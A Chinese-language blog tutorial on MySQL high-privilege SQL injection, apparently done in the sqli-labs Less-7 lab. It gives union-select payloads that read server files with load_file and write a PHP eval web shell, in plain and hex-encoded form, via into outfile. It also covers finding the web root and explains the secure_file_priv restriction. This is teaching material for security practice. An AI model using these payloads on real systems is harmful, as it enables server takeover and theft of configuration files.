1. MySQL高权限读写简介
1.1 前置知识
数据库的高权用户对服务器上的文件进行读取写入操纵,从而可以进行写入一句话木马来获得服务器权限或者读取服务器上的配置型文件等注入行为。- select load_file ('d:/w.txt'); # 读取w.txt
- select 'xxx' into outfile 'd:/1.txt'; # 将xxx写入1.txt,1.txt不存在则自动创建文件
字段数判定和注入点判定略,作信息收集看用户名是root后可以尝试高权注入- /?id=1 union select 1,load_file ('d:/w.txt'),3
- /?id=1 union select 1,'xxx',3 into outfile 'd:/1.txt'
1.3 写入后门代码
给出写入后门代码示例- /?id=1 union select 1,'<?php eval($_POST[x]);?>',3 into outfile '当前网站路径/1.php'
- /?id=1 union select 1,3c3f706870206576616c28245f504f53545b2778275d293f3e,3 into outfile '当前网站路径/1.php'
load_file与outfile函数都必要绝对路径,获取网站绝对路径的方法有以下几种:
- load_file常用路径直接读取配置文件,得到网站路径
- 扫描网站目录,尝试寻找遗留/phpinfo.php的文件
- 输入错误信息,看是否会报错返回路径
- 爆破路径
2. 黑盒测试
2.1 判定闭合类型
判定闭合类型为((''))- /?id=1' and '1'='1 You are in
- /?id=1' --+ 报错
- /?id=1') and ('1')=('1 You are in
- /?id=1') --+ 报错
- /?id=1')) and (('1'))=(('1 You are in
- /?id=1')) --+ You are in
写入后门代码
注意
- 如果你的靶场搭在物理机上,后门代码会被windows扫描并删除,并不是上传失败
- 如果上传失败,大概是secure_file_priv配置问题,请参考第三模块
- /?id=1')) union select 1,'<?php eval($_POST[x]);?>',3 into outfile 'E:\\phpstudy\\WWW\\sqli\\Less-7\\1.php'--+
3. secure_file_priv限制
3.1 secure_file_priv简介
高版本的MYSQL添加了一个新的特性secure_file_priv,secure_file_priv 是 MySQL 中用于限制文件操纵的体系变量,主要用于控制和限制数据库服务器对文件的访问权限。具体来说,它限制 LOAD DATA INFILE、SELECT INTO OUTFILE 等语句的操纵范围,确保数据库文件操纵只能在特定的目录中进行,进而增强体系的安全性。- linux
- /etc/my.cnf
- [mysqld]
- secure_file_priv=
- win
- my.ini
- [mysqld]
- secure_file_priv=
- 1. secure_file_priv="" 代表对文件读写没有限制
- 2. secure_file_priv="NULL" 代表不能进行文件读写
- 3. secure_file_priv="d :/phpstudy /mysql/data" 代表只能对该路径下文件进行读写
在做Less-7时,出现读写注入失败的问题,大概就是由于secure_file_priv克制了读写
想要知道你的secure_file_priv设置,执行以下sql语句:- SHOW VARIABLES LIKE 'secure_file_priv';
宇宙安全声明
本博客所提供的内容仅供学习与交流目标,全部文章、代码及相关资料仅用于提升网络安全知识水平。博主不对任何人因使用博客中提到的技术或工具而产生的任何结果负责。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
